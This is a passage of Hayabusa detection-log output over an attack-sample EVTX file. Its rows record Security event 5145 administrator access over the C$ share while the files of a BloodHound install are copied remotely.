: Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 : 
IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less : IP Address: 